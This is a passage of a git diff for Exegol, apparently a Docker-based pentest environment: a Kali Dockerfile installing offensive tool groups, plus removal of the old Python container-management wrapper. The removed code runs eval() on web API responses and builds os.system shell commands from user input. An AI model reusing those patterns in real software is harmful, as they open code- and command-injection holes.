@_nwodtuhs) - -FROM kalilinux/kali-rolling - -ADD sources /root/sources -RUN chmod +x /root/sources/install.sh - -RUN /root/sources/install.sh install_base - -# WARNING: install_most_used_tools can't be used with other functions other than: install_base, install_resources, install_clean -#RUN /root/sources/install.sh install_most_used_tools - -# WARNING: the following installs (except: install_base, install_resources, install_clean) can't be used with install_most_used_tools -# this is a temporary limitation -RUN /root/sources/install.sh install_misc_tools -RUN /root/sources/install.sh install_wordlists_tools -RUN /root/sources/install.sh install_cracking_tools -RUN /root/sources/install.sh install_osint_tools -RUN /root/sources/install.sh install_web_tools -#RUN /root/sources/install.sh install_c2_tools -#RUN /root/sources/install.sh install_services_tools -#RUN /root/sources/install.sh install_ad_tools -#RUN /root/sources/install.sh install_mobile_tools -#RUN /root/sources/install.sh install_iot_tools -#RUN /root/sources/install.sh install_rfid_tools -#RUN /root/sources/install.sh install_sdr_tools -#RUN /root/sources/install.sh install_network_tools -#RUN /root/sources/install.sh install_wifi_tools -#RUN /root/sources/install.sh install_forensic_tools -#RUN /root/sources/install.sh install_cloud_tools -#RUN /root/sources/install.sh install_steganography_tools -#RUN /root/sources/install.sh install_reverse_tools -#RUN /root/sources/install.sh install_GUI_tools -RUN /root/sources/install.sh install_code_analysis_tools - -RUN /root/sources/install.sh install_resources -RUN /root/sources/install.sh install_clean - -RUN rm -rf /root/sources - -WORKDIR /data -#CMD ["/bin/zsh"] diff --git a/exegol-docker-build b/exegol-docker-build new file mode 160000 index 00000000..07fab03c --- /dev/null +++ b/exegol-docker-build @@ -0,0 +1 @@ +Subproject commit 07fab03c7e502f4ebf7e12da3cb5d8178dba10e0 diff --git a/exegol-resources b/exegol-resources new file mode 160000 index 00000000..91bcf5bb --- /dev/null +++ b/exegol-resources @@ -0,0 +1 @@ +Subproject commit 91bcf5bbb5cf889b1103220ef5d9b7f7993b383b diff --git a/exegol.py b/exegol.py index 6df9eb16..1533c80b 100755 --- a/exegol.py +++ b/exegol.py @@ -1,1137 +1,12 @@ #!/usr/bin/env python3 # -*- coding: utf-8 -*- +try: + from exegol.manager.ExegolController import main +except ModuleNotFoundError as e: + print("Mandatory dependencies are missing:", e) + print("Please install them with pip3 install -r requirements.txt") + exit(1) -import argparse -import json -import os -import shutil -import subprocess -import docker -import requests -from dateutil import parser -from rich.table import Table -from rich import box -from rich.console import Console - -VERSION = "3.1.12.dev" - -''' -# TODO : -- faire plus d'affichage de debug -- dans l'epilog, donner des exemples pour les devs et/ou faire une partie advanced usage dans le wiki, référencer le wiki dans le readme -- vérifier que le help est clair (dans le help, bien expliquer que le container-tag est un identifiant unique pour le container) -- nettoyer les variables et fonctions qui ne sont plus utilisées -- remove le default suivant ~l507 + ~l534 quand j'aurais dockertag == branch, la stable pointe vers master là : if dockertag == "": dockertag = "stable" (rename de master et stable vers main ?) -- revoir la gestion/montage des ressources, peut-être un container différent ? -- tester un exegol -m sources install et de nommer l'image sur un nom existant, voir le comportement -- l640 corriger default_git_branch -- edit --device option so that it can be called multiple times to share multiple devices, need to adapt the info_containers -- remove the eval() calls -''' - - -class Logger: - def __init__(self, verbosity=0, quiet=False): - self.verbosity = verbosity - self.quiet = quiet - - def debug(self, message): - if self.verbosity == 2: - console.print("{}[DEBUG]{} {}".format("[yellow3]", "[/yellow3]", message), highlight=False) - - def verbose(self, message): - if self.verbosity >= 1: - console.print("{}[VERBOSE]{} {}".format("[blue]", "[/blue]", message), highlight=False) - - def info(self, message): - if not self.quiet: - console.print("{}[*]{} {}".format("[bold blue]", "[/bold blue]", message), highlight=False) - - def success(self, message): - if not self.quiet: - console.print("{}[+]{} {}".format("[bold green]", "[/bold green]", message), highlight=False) - - def warning(self, message): - if not self.quiet: - console.print("{}[-]{} {}".format("[bold orange3]", "[/bold orange3]", message), highlight=False) - - def error(self, message): - if not self.quiet: - console.print("{}[!]{} {}".format("[bold red]", "[/bold red]", message), highlight=False) - - def raw(self, message): - if not self.quiet: - console.print(message,end='') - - -def get_options(): - description = "This Python script is a wrapper for Exegol. It can be used to easily manage Exegol on your machine." - - examples = { - "install (↓ ~15GB max)": "exegol install", - "check image updates": "exegol info", - "get a shell\t": "exegol start", - "run as daemon\t": "exegol exec -e bloodhound", - "get a tmux shell": "exegol --shell tmux start", - "use wifi/bluetooth": "exegol --privileged start", - "use a Proxmark": "exegol --device /dev/ttyACM0 start", - "use a LOGITacker": "exegol --device /dev/ttyACM0 start", - "use an ACR122u": "exegol --device /dev/bus/usb/ start", - "use an HackRF One": "exegol --device /dev/bus/usb/ start", - "use an Crazyradio PA": "exegol --device /dev/bus/usb/ start", - } - - epilog = "{}Examples:{}\n".format(GREEN, END) - for example in examples.keys(): - epilog += " {}\t{}\n".format(example, examples[example]) - - actions = { - "start": "automatically start, resume, create or enter an Exegol container", - "stop": "stop an Exegol container in a saved state", - "install": "install Exegol image (build or pull depending on the chosen install --mode)", - "update": "update Exegol image (build or pull depending on the chosen update --mode)", - "remove": "remove Exegol image(s) and/or container(s)", - "exec": "execute a command on an Exegol container", - "info": "print info on containers and local & remote images (name, size, state, ...)", - "version": "print current version", - } - - actions_help = "" - for action in actions.keys(): - actions_help += "{}\t\t{}\n".format(action, actions[action]) - - modes = { - "release": "(default) downloads a pre-built image (from DockerHub) (faster)", - "sources": "builds from the local sources in {} (pull from GitHub then docker build, local edits won't be overwritten)".format( - EXEGOL_PATH - ) - } - - modes_help = "" - for mode in modes.keys(): - modes_help += "{}\t\t{}\n".format(mode, modes[mode]) - - parser = argparse.ArgumentParser( - description=description, - epilog=epilog, - formatter_class=argparse.RawTextHelpFormatter, - ) - - # Required arguments - parser._positionals.title = "{}Required arguments{}".format("\033[1;32m", END) - parser.add_argument("action", choices=actions.keys(), help=actions_help) - parser.add_argument( - "-k", - "--insecure", - dest="verify", - action="store_false", - default=True, - required=False, - help="Allow insecure server connections for web requests (default: False)", - ) - - # Optional arguments - parser._optionals.title = "{}Optional arguments{}".format(BLUE, END) - logging = parser.add_mutually_exclusive_group() - logging.add_argument( - "-v", - "--verbose", - dest="verbosity", - action="count", - default=0, - help="verbosity level (-v for verbose, -vv for debug)", - ) - logging.add_argument( - "-q", - "--quiet", - dest="quiet", - action="store_true", - default=False, - help="show no information at all", - ) - - # Install/update options - install_update = parser.add_argument_group( - "{}Install/update options{}".format(BLUE, END) - ) - install_update.add_argument( - "-m", - "--mode", - dest="mode", - action="store", - choices=modes.keys(), - default="release", - help=modes_help, - ) - - # Default start options - default_start = parser.add_argument_group( - "{}Default start options{}".format(BLUE, END), - description='The following options are enabled by default. They can all be disabled with the advanced option "--no-default". They can then be enabled back separately, for example "exegol --no-default --X11 start"', - ) - default_start.add_argument( - "-x", - "--X11", - dest="X11", - action="store_true", - help="enable display sharing to run GUI-based applications", - ) - default_start.add_argument( - "--host-timezones", - dest="host_timezones", - action="store_true", - help="let the container share the host's timezones configuration", - ) - default_start.add_argument( - "--host-network", - dest="host_network", - action="store_true", - help="let the container share the host's networking namespace (the container shares the same interfaces and has the same adresses, needed for mitm6)", - ) - default_start.add_argument( - "--bind-resources", - dest="bind_resources", - action="store_true", - help="mount the /opt/resources of the container in a subdirectory of host\'s {}".format(SHARED_RESOURCES) - ) - default_start.add_argument( - "-s", - "--shell", - dest="shell", - action="store", - choices={"zsh", "bash", "tmux"}, - default="zsh", - help="select shell to start when entering Exegol (Default: zsh)", - ) - - default_start.add_argument( - "-e", - "--exec", - dest="exec", - action="store", - help="execute a command on exegol container", - ) - - - # Advanced start options - advanced_start = parser.add_argument_group( - "{}Advanced start/stop/reset options{}".format(BLUE, END) - ) - advanced_start.add_argument( - "-t", - "--container-tag", - dest="containertag", - action="store", - help="tag to use in the container name", - ) - advanced_start.add_argument( - "--no-default", - dest="no_default", - action="store_true", - default=False, - help="disable the default start options (e.g. --X11, --host-network)", - ) - advanced_start.add_argument( - "--privileged", - dest="privileged", - action="store_true", - default=False, - help="(dangerous) give extended privileges at the container creation (e.g. needed to mount things, to use wifi or bluetooth)", - ) - advanced_start.add_argument( - "-d", - "--device", - dest="device", - action="store", - help="add a host device at the container creation", - ) - advanced_start.add_argument( - "-c", - "--custom-options", - dest="custom_options", - action="store", - default="", - help="specify custom options for the container creation", - ) - advanced_start.add_argument( - "-cwd", - "--cwd-mount", - dest="mount_current_dir", - action="store_true", - help="mount current dir to container's /workspace", - ) - - options = parser.parse_args() - - if not options.no_default: - options.X11 = True - options.host_network = True - options.bind_resources = True - options.action = options.action.replace("-", "") - if options.action == "update": - options.action = "install" - return options - - -def container_exists(containertag): - containers = client.containers.list(all=True, filters={"name": "exegol-" + containertag}) - for container in containers: - if not container.name == "exegol-" + containertag: - containers.remove(container) - logger.debug("Containers with name {}: {}".format("exegol-" + containertag, str(len(containers)))) - if len(containers) > 1: - logger.error("Something's wrong, you shouldn't have multiple containers with the same name...") - exit(1) - else: - return bool(len(containers)) - - -def was_created_with_gui(container): - logger.debug( - "Looking for the {} in the container {}".format("'DISPLAY' environment variable", container.attrs["Name"])) - container_info = container.attrs - for var in container_info["Config"]["Env"]: - if "DISPLAY" in var: - return True - return False - - -def was_created_with_privileged(container): - logger.debug("Looking for the {} in the container {}".format("'Privileged' attribute", container.attrs["Name"])) - return container.attrs["HostConfig"]["Privileged"] - - -def was_created_with_device(container): - logger.debug("Looking for the {} in the container {}".format("'Devices' attribute", container.attrs["Name"])) - if container.attrs["HostConfig"]["Devices"]: - return container.attrs["HostConfig"]["Devices"][0]["PathOnHost"] - else: - return False - - -def was_created_with_host_networking(container): - logger.debug("Looking for the {} in the container {}".format("'host' value in the 'Networks' attribute", - container.attrs["Name"])) - return ("host" in container.attrs["NetworkSettings"]["Networks"]) - - -def container_analysis(container): - if was_created_with_device(container): - if options.device and options.device != was_created_with_device(container): - logger.warning( - "Container was created with another shared device ({}), you need to reset it and start it with the -d/--device option, and the name of the device, for it to be taken into account".format( - was_created_with_device(container))) - else: - logger.verbose( - "Container was created with host device ({}) sharing".format(was_created_with_device(container))) - elif options.device: - logger.warning( - "Container was created with no device sharing, you need to reset it and start it with the -d/--device option, and the name of the device, for it to be taken into account" - ) - - if was_created_with_privileged(container): - logger.warning("Container was given extended privileges at its creation") - elif options.privileged: - logger.warning( - "Container was not given extended privileges at its creation, you need to reset it and start it with the -p/--privileged option for it to be taken into account" - ) - - if was_created_with_host_networking(container): - logger.verbose("Container was created with host networking") - elif options.host_network: - logger.warning( - "Container was not created with host networking, you need to reset it and start it with the --host-network (or without --no-default) option for it to be taken into account" - ) - - if was_created_with_gui(container): - logger.verbose("Container was created with display sharing") - elif options.X11: - logger.warning( - "Container was not created with display sharing, you need to reset it and start it with the -x/--X11 " - "option (or without --no-default) for it to be taken into account " - ) - - -def container_creation_options(containertag): - base_options = "" - advanced_options = "" - if options.X11: - logger.verbose("Enabling display sharing") - advanced_options += " --env DISPLAY=unix{}".format(os.getenv("DISPLAY")) - advanced_options += " --volume /tmp/.X11-unix:/tmp/.X11-unix" - advanced_options += ' --env="QT_X11_NO_MITSHM=1"' - if options.host_timezones: - logger.verbose("Enabling host timezones") - advanced_options += " --volume /etc/timezone:/etc/timezone:ro" - advanced_options += " --volume /etc/localtime:/etc/localtime:ro" - if options.host_network: - logger.verbose("Enabling host networking") - advanced_options += " --network host" - if options.bind_resources: - # TODO: find a solution for this, if two containers have differents resources, when I boot container A and B, B's resources will be overwriten with A's - logger.verbose("Sharing /opt/resources (container) ↔ {} (host)".format(SHARED_RESOURCES)) - if not os.path.isdir(SHARED_RESOURCES): - logger.debug("Host directory {} doesn\'t exist. Creating it...".format(SHARED_RESOURCES)) - os.mkdir(SHARED_RESOURCES) - advanced_options += ' --mount ' - advanced_options += 'type=volume,' - advanced_options += 'dst=/opt/resources,' - advanced_options += 'volume-driver=local,' - advanced_options += 'volume-opt=type=none,' - advanced_options += 'volume-opt=o=bind,' - advanced_options += 'volume-opt=device={}'.format(SHARED_RESOURCES) - if options.privileged: - logger.warning("Enabling extended privileges") - advanced_options += " --privileged" - if options.device: - logger.verbose("Enabling host device ({}) sharing".format(options.device)) - advanced_options += " --device {}".format(options.device) - if options.mount_current_dir: - logger.verbose("Sharing /workspace (container) ↔ {} (host)".format(os.getcwd())) - advanced_options += " --volume {}:/workspace".format(os.getcwd()) - if options.custom_options: - logger.verbose("Specifying custom options: {}".format(options.custom_options)) - advanced_options += " " + options.custom_options - base_options += " --interactive" - base_options += " --tty" - # base_options += ' --detach' - base_options += " --volume {}:/data".format(SHARED_DATA_VOLUMES + "/" + containertag) - base_options += " --name {}".format("exegol-" + containertag) - base_options += " --hostname {}".format("exegol-" + containertag) - return base_options, advanced_options - - -# Exec command on host with output being printed with logger.debug() or logger.error() -def exec_popen(command): - cmd = command.split() - logger.debug("Running command on host with subprocess.Popen(): {}".format(str(cmd))) - output = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) - stdout, stderr = output.communicate() - if stdout is not None and not stdout == b"": - for line in stdout.decode().strip().splitlines(): - logger.debug("{}(cmd stdout){}\t{}".format(BLUE, END, line)) - if stderr is not None and not stderr == b"": - for line in stderr.decode().strip().splitlines(): - logger.error("{}(cmd stderr){}\t{}".format(RED, END, line)) - - -def readable_size(size, precision=1): - # https://stackoverflow.com/a/32009595 - suffixes = ["B", "KB", "MB", "GB", "TB"] - suffix_index = 0 - while size > 1024 and suffix_index < 4: - suffix_index += 1 # increment the index of the suffix - size = size / 1024.0 # apply the division - return "%.*f%s" % (precision, size, suffixes[suffix_index]) - - -# Exec command on host with output being printed without treatment -def exec_system(command): - logger.debug("Running on host with os.system(): {}".format(command)) - os.system(command) - - -def select_containertag(local_git_branch): - logger.info("No container tag (-t/--container-tag) supplied") - - info_containers() - - # default to local git branch or master if none - if not local_git_branch: - default_containertag = "master" - else: - default_containertag = local_git_branch - - # fetching containers - containers = client.containers.list(all=True, filters={"name": "exegol-"}) - len_containers = len(containers) - logger.debug("Available local containers: {}".format(len_containers)) - - # default to last created container - # TODO: need to find a way to default to the latest "used" container instead of "created" - logger.debug("Fetching 'FinishedAt' attribute for each container") - last_used_container_tag = "" - if not len_containers == 0: - finished_at = "" - for container in containers: - logger.debug("└── " + str(container.attrs["Name"]) + " → " + str(container.attrs["State"]["FinishedAt"])) - this_finished_at = parser.parse(container.attrs["State"]["FinishedAt"]) - if finished_at: - if this_finished_at >= finished_at: - finished_at = this_finished_at - last_used_container_tag = container.attrs["Name"].replace('/exegol-', '') - else: - last_used_container_tag = container.attrs["Name"].replace('/exegol-', '') - finished_at = this_finished_at - logger.debug("Last created container: {}".format(last_used_container_tag)) - if last_used_container_tag: - default_containertag = last_used_container_tag - - # default to container that has the local dir mounted as volume - logger.debug("Fetching volumes for each container") - cwd_in_vol_container = "" - if not len_containers == 0: - for container in containers: - volumes = [] - if container.attrs["HostConfig"].get("Binds"): - for bind in container.attrs["HostConfig"]["Binds"]: - volumes.append(bind.split(":")[0]) - if container.attrs["HostConfig"].get("Mounts"): - for mount in container.attrs["HostConfig"]["Mounts"]: - volumes.append(mount["VolumeOptions"]["DriverConfig"]["Options"]["device"]) - logger.debug("└── " + str(container.attrs["Name"]) + " → " + str(volumes)) - if os.getcwd() in volumes: - cwd_in_vol_container = container.attrs["Name"].replace('/exegol-', '') - logger.debug("Current dir is in volumes of container: {}".format(cwd_in_vol_container)) - if cwd_in_vol_container: - default_containertag = cwd_in_vol_container - - containertags = [] - if not len_containers == 0: - for container in containers: - containertags.append(container.attrs["Name"].replace('/exegol-', '')) - - containertag = input( - "{}[?]{} What container do you want to {} [default: {}]? ".format(BOLD_BLUE, END, options.action, - default_containertag)) - - if not containertag: - options.containertag = default_containertag - else: - options.containertag = containertag - - -def start(): - global LOOP_PREVENTION - len_images = len(client.images.list(IMAGE_NAME, filters={"dangling": False})) - if not len_images == 0: - if LOOP_PREVENTION == "": - logger.success("{} Exegol images exist".format(len_images)) - if not options.containertag: - len_containers = len(client.containers.list(all=True, filters={"name": "exegol-"})) - if len_containers > 0: - select_containertag(LOCAL_GIT_BRANCH) - else: - # no container exists, let's set the containertag and we'll bypass the next condition - # and go directly to the else, i.e. the container creation - # default to local git branch or master if none - if not LOCAL_GIT_BRANCH: - options.containertag = "master" - else: - options.containertag = LOCAL_GIT_BRANCH - if container_exists(options.containertag): - if LOOP_PREVENTION == "" or LOOP_PREVENTION == "create": - logger.success("Container exists") - containers = client.containers.list(all=True, filters={"name": "exegol-" + options.containertag}) - for container in containers: - if not container.name == "exegol-" + options.containertag: - containers.remove(container) - container = containers[0] - if container.attrs["State"]["Status"] == "running": - if LOOP_PREVENTION == "exec": - logger.debug("Loop prevention triggered") - logger.error("Something went wrong...") - else: - logger.success("Container is up") - container_analysis(container) - if was_created_with_gui(container): - logger.info("Running xhost command for display sharing") - exec_popen( - "xhost +local:{}".format( - client.api.inspect_container("exegol-" + options.containertag)["Config"][ - "Hostname" - ] - ) - ) - if options.exec is None: - logger.info("Entering Exegol") - exec_system("docker exec -ti {} {}".format("exegol-" + options.containertag, options.shell)) - else: - logger.info("Executing command on Exegol") - # Using 'zsh source /opt/.zsh_aliases; eval cmd' to interpret alias commands on a non-interactive shell - cmd = "zsh -c \"source /opt/.zsh_aliases; eval \'{}\'\"".format(options.exec.replace("\"", "\\\"").replace("\'", "\\\'")) - logger.debug(cmd) - logs_stream = container.exec_run(cmd, detach=False, stream=True) - try: - for log in logs_stream[1]: - logger.raw(log.decode("utf-8")) - except KeyboardInterrupt: - logger.info("Detaching process logging") - logger.warning("Exiting this command do NOT stop the process in the container") - LOOP_PREVENTION = "exec" - else: - if LOOP_PREVENTION == "start": - logger.debug("Loop prevention triggered") - logger.error("Something went wrong...") - else: - logger.warning("Container is down") - logger.info("Starting the container") - exec_popen("docker start {}".format("exegol-" + options.containertag)) - LOOP_PREVENTION = "start" - start() - else: - if LOOP_PREVENTION == "create": - logger.debug("Loop prevention triggered") - logger.error("Something went wrong...") - else: - logger.warning("Container does not exist") - info_images() - if LOCAL_GIT_BRANCH == "master": # TODO: fix this crap when I'll have branch names that are equal to docker tags - default_dockertag = "stable" - else: - default_dockertag = LOCAL_GIT_BRANCH - imagetag = input( - "{}[?]{} What image do you want the container to create to be based upon [default: {}]? ".format( - BOLD_BLUE, END, default_dockertag)) - if not imagetag: - imagetag = default_dockertag - if client.images.list(IMAGE_NAME + ":" + imagetag): - info_containers() - if options.containertag: - default_containertag = options.containertag - elif not container_exists(imagetag): - default_containertag = imagetag - else: - logger.error(f"Something's wrong. Please create a detailed issue with everything you did and are trying to do (https://github.com/ShutdownRepo/Exegol/issues)") - # When running start without supplying a container tag, there are multiple scenarios - # 1. if >= 1 container(s) exist(s), one will be chosen to start - # 2. else, a container is created, either using a supplied tag or using the imagetag - # The user shouldn't end up here. - client.containers.list(all=True, filters={"name": "exegol-"}) - containertag = input( - "{}[?]{} What unique tag do you want to name your container with (one not in list above) [default: {}]? ".format( - BOLD_BLUE, END, default_containertag)) - if containertag == "": - containertag = default_containertag - options.containertag = containertag - logger.info("Creating the container") - logger.debug("{} container based on the {} image".format("exegol-" + containertag, - IMAGE_NAME + ":" + imagetag)) - base_options, advanced_options = container_creation_options(options.containertag) - exec_popen("docker create {} {} {}:{}".format(base_options, advanced_options, IMAGE_NAME, imagetag)) - LOOP_PREVENTION = "create" - start() - else: - logger.warning("Image {} does not exist. You must supply a tag from the list above.".format( - IMAGE_NAME + ":" + imagetag)) - else: - if LOOP_PREVENTION == "install": - logger.debug("Loop prevention triggered") - logger.error("Something went wrong...") - else: - logger.warning("Exegol image does not exist, you must install it first") - confirmation = input( - "{}[?]{} Do you wish to install it now (↓ ~6GB)? [y/N] ".format( - BOLD_ORANGE, END - ) - ) - if confirmation == "y" or confirmation == "yes" or confirmation == "Y": - install() - LOOP_PREVENTION = "install" - start() - - -def stop(): - if not options.containertag: - select_containertag(LOCAL_GIT_BRANCH) - containers = client.containers.list(all=True, filters={"name": "exegol-" + options.containertag}) - for container in containers: - if not container.name == "exegol-" + options.containertag: - containers.remove(container) - container = containers[0] - if container.attrs["State"]["Status"] == "running": - logger.info("Container is up") - logger.info("Stopping container") - exec_popen("docker stop --time 3 {}".format("exegol-" + options.containertag)) - containers = client.containers.list(all=True, filters={"name": "exegol-" + options.containertag}) - for container in containers: - if not container.name == "exegol-" + options.containertag: - containers.remove(container) - container = containers[0] - if container.attrs["State"]["Status"] == "running": - logger.error("Container is still up, something went wrong...") - else: - logger.success("Container is down") - else: - logger.success("Container is down") - - -def remove_container(): - if not options.containertag: - select_containertag(LOCAL_GIT_BRANCH) - if container_exists(options.containertag): - logger.info("Container exists") - stop() - logger.info("Deleting container") - exec_popen("docker rm {}".format("exegol-" + options.containertag)) - if container_exists(options.containertag): - logger.error("Something went wrong...") - else: - logger.success("Container does not exist anymore") - else: - logger.success("Container does not exist") - logger.info("Cleaning unused host directories (resources and empty data)") - if os.path.isdir(SHARED_RESOURCES): - logger.verbose("Host directory {} exists. Removing it...".format(SHARED_RESOURCES)) - try: - shutil.rmtree(SHARED_RESOURCES) - except PermissionError: - logger.warning("I don't have the rights to remove {}".format(SHARED_RESOURCES)) - except: - logger.error("Something else went wrong") - if os.path.isdir(SHARED_DATA_VOLUMES + "/" + options.containertag): - if len(os.listdir(SHARED_DATA_VOLUMES + "/" + options.containertag)) == 0: - logger.verbose("Host directory {} exists and is empty. Removing...".format( - SHARED_DATA_VOLUMES + "/" + options.containertag)) - try: - shutil.rmtree(SHARED_DATA_VOLUMES + "/" + options.containertag) - except PermissionError: - logger.warning("I don't have the rights to remove {} (do it yourself)".format( - SHARED_DATA_VOLUMES + "/" + options.containertag)) - except: - logger.error("Something else went wrong") - - -def install(): - info_images() - if options.mode == "release": - if LOCAL_GIT_BRANCH == "master": # TODO: fix this crap when I'll have branch names that are equal to docker tags - default_dockertag = "stable" - else: - default_dockertag = LOCAL_GIT_BRANCH - dockertag = input( - "{}[?]{} What remote image (tag) do you want to install/update [default: {}]? ".format(BOLD_BLUE, END, - default_dockertag)) - if dockertag == "": - dockertag = default_dockertag - logger.debug("Fetching DockerHub images tags") - remote_image_tags = [] - remote_images_request = requests.get(url="https://hub.docker.com/v2/repositories/{}/tags".format(IMAGE_NAME), verify=options.verify) - for image in \ - eval( - remote_images_request.text.replace("true", "True").replace("false", "False").replace("null", '""'))[ - "results"]: - remote_image_tags.append(image["name"]) - if dockertag not in remote_image_tags: - logger.warning("The supplied tag doesn't exist. You must use one from the previous list") - else: - logger.info("Pulling sources from GitHub (local changes won't be overwritten)") - exec_system("git -C {} pull origin --rebase {}".format(EXEGOL_PATH, LOCAL_GIT_BRANCH)) - logger.info("Pulling {} from DockerHub".format(IMAGE_NAME + ":" + dockertag)) - exec_system("docker pull {}:{}".format(IMAGE_NAME, dockertag)) - elif options.mode == "sources": - logger.debug("Fetching available GitHub branches") - branches_request = requests.get(url="https://api.github.com/repos/ShutdownRepo/Exegol/branches", verify=options.verify) - branches = eval(branches_request.text.replace("true", "True").replace("false", "False").replace("null", '""')) - logger.info("Available GitHub branches") - for branch in branches: - logger.info(" • {}".format(branch["name"])) - default_branch = LOCAL_GIT_BRANCH - branch = input( - "{}[?]{} What branch do you want the code to be based upon [default: {}]? ".format(BOLD_BLUE, END, - default_branch)) - if branch == "": - branch = default_branch - branch_in_branches = False - for b in branches: - if branch == b["name"]: - branch_in_branches = True - if not branch_in_branches: - logger.warning("The supplied branch doesn't exist. You must use one from the previous list") - else: - logger.info("Pulling sources from GitHub (local changes won't be overwritten)") - # TODO: not sure the following cmd is needed : exec_system("git -C {} checkout {}".format(EXEGOL_PATH, branch)) - exec_system("git -C {} pull origin {}".format(EXEGOL_PATH, branch)) - if branch == "master": - default_imagetag = "stable" - else: - default_imagetag = branch - imagetag = input( - "{}[?]{} What tag do you want to give to your Exegol image [default: {}]? ".format(BOLD_BLUE, END, - default_imagetag)) - if not imagetag: - imagetag = default_imagetag - logger.info("Building Exegol image {} from sources".format(IMAGE_NAME + ":" + imagetag)) - exec_system( - "docker build --no-cache --tag {}:{} {} | tee {}/.build.log".format( - IMAGE_NAME, imagetag, EXEGOL_PATH, EXEGOL_PATH - ) - ) - - -def remove_image(): - len_images = len(client.images.list(IMAGE_NAME, filters={"dangling": False})) - logger.info("Available local images: {}".format(len_images)) - if not len_images == 0: - info_images() - imagetag = input("{}[?]{} What image do you want to remove (give tag)? ".format(BOLD_BLUE, END)) - if not client.images.list(IMAGE_NAME + ":" + imagetag): - logger.warning("Image {} does not exist. You must supply a tag from the list above.".format( - IMAGE_NAME + ":" + imagetag)) - else: - logger.warning( - "About to remove docker Image {}".format(IMAGE_NAME + ":" + imagetag) - ) - confirmation = input( - "{}[?]{} Are you sure you want to do this? [y/N] ".format(BOLD_ORANGE, END) - ) - if confirmation == "y" or confirmation == "yes" or confirmation == "Y": - logger.info("Deletion confirmed, proceeding") - logger.info("Deleting image {}".format(IMAGE_NAME + ":" + imagetag)) - exec_system("docker image rm {}".format(IMAGE_NAME + ":" + imagetag)) - if client.images.list(IMAGE_NAME + ":" + imagetag): - logger.error("Exegol image is still here, something is wrong...") - else: - logger.success("Exegol image has been successfully removed") - else: - logger.info("Deletion canceled") - else: - logger.info("No Exegol image here, ya messin with me?") - - -def remove(): - # TODO: this needs to be improved to have the possibility to remove files, networks and so on related to Exegol, - # and improve for simultaneous multiple removals - to_remove = input("{}[?]{} Do you want to remove container(s) or image(s) [C/i]? ".format(BOLD_BLUE, END)) - if to_remove.lower() == "c" or not to_remove: - remove_container() - elif to_remove.lower() == "i": - remove_image() - else: - logger.warning("Invalid choice") - - -def info_images(): - images = [] - logger.info("Available images") - remote_images = {} - logger.debug("Fetching remote image tags, digests and sizes") - try: - remote_images_request = requests.get(url="https://hub.docker.com/v2/repositories/{}/tags".format(IMAGE_NAME), timeout=(5, 10), verify=options.verify) - remote_images_list = json.loads(remote_images_request.text) - for image in remote_images_list["results"]: - tag = image["name"] - digest = image["images"][0]["digest"] - compressed_size = readable_size(image["full_size"]) - logger.debug("└── {} → {}...".format(tag, digest[:32])) - remote_images[digest] = {"tag": tag, "compressed_size": compressed_size} - notinstalled_remote_images = remote_images - logger.debug("Fetching local image tags, digests (and other attributes)") - local_images_list = client.images.list(IMAGE_NAME, filters={"dangling": False}) - for image in local_images_list: - id = image.attrs["Id"].split(":")[1][:12] - if not image.attrs["RepoTags"]: - # TODO: investigate this, print those images as "layers" - # these are layers for other images - real_size = readable_size(image.attrs["Size"]) - digest = image.attrs["Id"].replace("sha256:", "") - images.append([id, "", real_size, "local layer"]) - else: - name, tag = image.attrs["RepoTags"][0].split(':') - real_size = readable_size(image.attrs["Size"]) - - if image.attrs["RepoDigests"]: # If true, the image was pulled instead of built - digest = image.attrs["RepoDigests"][0].replace("{}@".format(IMAGE_NAME), "") - - logger.debug("└── {} → {}...".format(tag, digest[:32])) - if digest in remote_images.keys(): - images.append([id, tag, real_size, "remote ({}, {})".format("[green]up to date[/green]", - remote_images[digest][ - "compressed_size"])]) - notinstalled_remote_images.pop(digest) - else: - for key in remote_images: - if remote_images[key]["tag"] == tag: - remote_digest = key - break - else: # This means the image was pulled but it doesn't exist anymore on DockerHub - remote_digest = "" - if remote_digest: - compressed_size = remote_images[remote_digest]["compressed_size"] - images.append([id, tag, real_size, - "remote ({}, {})".format("[orange3]deprecated[/orange3]", compressed_size)]) - notinstalled_remote_images.pop(remote_digest) - else: - images.append([id, tag, real_size, "remote ({})".format("[bright_black]discontinued[" - "/bright_black]")]) - else: - images.append([id, tag, real_size, "local image"]) - for uninstalled_remote_image in notinstalled_remote_images.items(): - tag = uninstalled_remote_image[1]["tag"] - compressed_size = uninstalled_remote_image[1]["compressed_size"] - id = uninstalled_remote_image[0].split(":")[1][:12] - images.append([id, tag, "[bright_black]N/A[/bright_black]", - "remote ({}, {})".format("[yellow3]not installed[/yellow3]", compressed_size)]) - images = sorted(images, key=lambda k: k[1]) - if options.verbosity == 0: - table = Table(show_header=True, header_style="bold blue", border_style="blue", box=box.SIMPLE) - table.add_column("Image tag") - table.add_column("Real size") - table.add_column("Type") - for image in images: - if image[1] != "": - table.add_row(image[1], image[2], image[3]) - elif options.verbosity >= 1: - table = Table(show_header=True, header_style="bold blue", border_style="grey35", box=box.SQUARE) - table.add_column("Id") - table.add_column("Image tag") - table.add_column("Real size") - table.add_column("Type") - for image in images: - table.add_row(image[0], image[1], image[2], image[3]) - console.print(table) - print() - except requests.exceptions.ConnectionError as err: - logger.warning("Connection Error: you probably have no internet, skipping online queries") - logger.warning(f"Error: {err}") - - -def info_containers(): - len_containers = len(client.containers.list(all=True, filters={"name": "exegol-"})) - if len_containers > 0: - logger.info("Available local containers: {}".format(len_containers)) - containers = [] - for container in client.containers.list(all=True, filters={"name": "exegol-"}): - id = container.attrs["Id"][:12] - tag = container.attrs["Name"].replace('/exegol-', '') - state = container.attrs["State"]["Status"] - if state == "running": - state = "[green]" + state + "[/green]" - image = container.attrs["Config"]["Image"] - logger.debug("Fetching details on containers creation") - details = [] - if was_created_with_gui(container): - details.append("--X11") - if was_created_with_host_networking(container): - details.append("--host-network") - if was_created_with_device(container): - details.append("--device {}".format(was_created_with_device(container))) - if was_created_with_privileged(container): - details.append("[orange3]--privileged[/orange3]") - details = " ".join(details) - logger.debug("Fetching volumes for each container") - volumes = "" - if "Binds" in container.attrs["HostConfig"].keys(): - for bind in container.attrs["HostConfig"]["Binds"]: - volumes += bind.replace(":", " ↔ ") + "\n" - if "Mounts" in container.attrs["HostConfig"].keys(): - for mount in container.attrs["HostConfig"]["Mounts"]: - volumes += mount["VolumeOptions"]["DriverConfig"]["Options"]["device"] - volumes += " ↔ " - volumes += mount["Target"] - volumes += "\n" - containers.append([id, tag, state, image, details, volumes]) - if options.verbosity == 0: - table = Table(show_header=True, 